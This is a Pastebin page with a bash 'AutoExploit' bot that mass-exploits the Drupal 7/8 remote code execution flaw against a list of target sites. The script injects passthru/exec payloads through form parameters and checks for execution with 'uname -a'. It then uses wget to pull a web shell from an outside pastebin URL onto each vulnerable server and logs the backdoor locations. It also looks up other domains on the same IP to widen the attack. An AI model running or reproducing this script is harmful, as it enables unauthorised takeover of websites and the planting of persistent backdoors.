API tools faq
paste
zerobyte-id

Exploiter CMS Drupal RCE

zerobyte-id
May 3rd, 2018
603
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 6.46 KB
raw download clone embed print report
  1. #!/bin/bash
  2. # AutoExploit [BOT]
  3. # Remote Code Execute CMS Drupal 7.x - 8 + Reverse IP
  4. # Date : 22 - Apr - 2018
  5. # Usage : ./rce.sh list.txt
  6. # Coded by ZeroByte.ID
  7. useragent="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0";
  8. reverse() {
  9.   target=$1
  10.   getip=$(dig +short $1);
  11.   check=$(curl -s https://api.hackertarget.com/reverseiplookup/?q=${getip});
  12.    if [[ $check =~ 'No records found' ]]; then
  13.       echo "[BAD] $getip";
  14.       return 1
  15.    elif [[ $check =~ 'error check' ]]; then
  16.       echo "[BAD] $getip";
  17.       return 1
  18.    elif [[ $check =~ 'API count exceeded' ]]; then
  19.       echo "[WAITING]"
  20.       echo "ROBOT BUTUH ISTIRAHAT BENTARAN!";
  21.       echo "[JANGAN DI STOP!]";
  22.       echo "GUA LAGI NGOPI KURANG LEBIH 10 Menit";
  23.       sleep 10m;
  24.       exit
  25.    else
  26.       curl -s https://api.hackertarget.com/reverseiplookup/?q=${getip} >> domain.tmp
  27.       sleep 0.5s
  28.       list=$(cat domain.tmp | wc -l);
  29.       cat domain.tmp | sed 's|www.||g' | sed 's|mail.||g' >> domains2.tmp
  30.       sort domains2.tmp | uniq >> domains.tmp
  31.       echo "[OK] $getip and $list site";
  32.       sleep 0.6s
  33.       rm domain.tmp
  34.       rm domains2.tmp
  35.     fi
  36. }
  37. drupal7() {
  38.     target=$1
  39.     echo -ne "---";
  40.     cek7=$(curl -s -m 10 -X POST -A ${useragent} --cookie-jar cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id);
  41.     echo -ne "-------";
  42.     sleep 2s
  43.     if [[ $cek7 =~ 'value="form-' ]]; then
  44.         echo -ne "--------------------------";
  45.         token=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id | grep -Po '(?<=value=")[^" \>]*' | head -1);
  46.         echo -ne "----------------------------------";
  47.         echo
  48.         sleep 2s
  49.         result=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=file/ajax/name/%23value/${token}" --data "form_build_id=${token}" | head -1)
  50.         if [[ $result =~ 'Linux' ]]; then
  51.           echo "[O] VULN RCE $target : uname -a"
  52.           echo "$result";
  53.           echo "Proses Upload Shell ....."
  54.           sleep 2s
  55.           uploadhome=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=wget+-o+zb.php+"https://pastebin.com/raw/S1c9b4ne"" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id | grep -Po '(?<=value=")[^" \>]*' | head -1);
  56.           curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=file/ajax/name/%23value/${uploadhome}" --data "form_build_id=${uploadhome}" | head -1 > /dev/null
  57.           sleep 5s
  58.           cekshellhome=$(curl -s -m 10 "${target}/zb.php");
  59.           if [[ $cekshellhome =~ 'ZeroByte.ID' ]]; then
  60.             echo "[HOME] Upload Done"
  61.             echo "$result" >> result.txt
  62.             echo "$target/zb.php" | tee -a result.txt
  63.           else
  64.             echo "[HOME] Can't Upload"
  65.           fi
  66.           sleep 2s
  67.           uploaddir=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=wget+-o+sites/default/files/zb.php+"https://pastebin.com/raw/S1c9b4ne"" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id | grep -Po '(?<=value=")[^" \>]*' | head -1);
  68.           curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=file/ajax/name/%23value/${uploaddir}" --data "form_build_id=${uploaddir}" | head -1 > /dev/null
  69.           sleep 5s
  70.           cekshell=$(curl -s -m 10 "${target}/sites/default/files/zb.php");
  71.           if [[ $cekshell =~ 'ZeroByte.ID' ]]; then
  72.             echo "[DIR WRITABLE] Upload Done"
  73.             echo "$result" >> result.txt
  74.             echo "$target/sites/default/files/zb.php" | tee -a result.txt
  75.             echo "=====================================" >> result.txt
  76.             reverse $target
  77.           else
  78.             echo "[DIR WRITABLE] Can't Upload"
  79.             echo "$target" >> gagal-upload.txt
  80.           fi
  81.           echo "--------------------------------------------------------------------------"
  82.         else
  83.             echo "[X] NOT VULN $target"
  84.             drupal8 $target
  85.         fi
  86.     else
  87.         echo
  88.         echo "[X] NOT VULN $target";
  89.         drupal8 $target
  90.        
  91.     fi
  92. }
  93. drupal8() {
  94.   target=$1
  95.   echo "[O] CHECKING DRUPAL 8";
  96.   echo -ne "---";
  97.   cek8=$(curl -s -m 10 -k "${target}/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" --data "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=wget 'https://pastebin.com/raw/S1c9b4ne' -O zb.php")
  98.   cek8_=$(curl -s -m 10 -k "${target}/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" --data "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=wget 'https://pastebin.com/raw/S1c9b4ne' -O sites/default/files/zb.php")
  99.   echo -ne "-------------------";
  100.   if [[ $cek8 =~ 'ZeroByte.ID' ]]; then
  101.     echo -ne "-------------------------------------------";
  102.     echo "[O] Upload Done"
  103.     echo "$target/zb.php" | tee -a result.txt
  104.     reverse $target
  105.   else
  106.     if [[ $cek8_ =~ 'ZeroByte.ID' ]]; then
  107.       echo -ne "-------------------------------------------";
  108.       echo "[O] Upload Done"
  109.       echo "$target/sites/default/files/zb.php" | tee -a result.txt
  110.     fi
  111.     echo
  112.     echo "[X] NOT VULN $target !"
  113.     echo -ne "-------------------------------------------------";
  114.     echo "$target" >> not-vuln.txt
  115.     echo
  116.   fi
  117. }
  118.  
  119. cat << "banner"
  120. --------------------------------------------------
  121.                    _           _         _     _
  122.  _______ _ __ ___ | |__  _   _| |_ ___  (_) __| |
  123. |_  / _ \ '__/ _ \| '_ \| | | | __/ _ \ | |/ _` |
  124.  / /  __/ | | (_) | |_) | |_| | ||  __/_| | (_| |
  125. /___\___|_|  \___/|_.__/ \__, |\__\___(_)_|\__,_|
  126.                          |___/                  
  127.                                             kUr4x        
  128. ----------------[ RCE Drupal ]--------------------
  129.  
  130. banner
  131.  
  132. for s in $(cat $1); do
  133.     echo "CHECKING DRUPAL 7 $s"
  134.     echo -ne "----";
  135.     drupal7 $s
  136. done
  137. rm cookie.tmp
RAW Paste Data
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×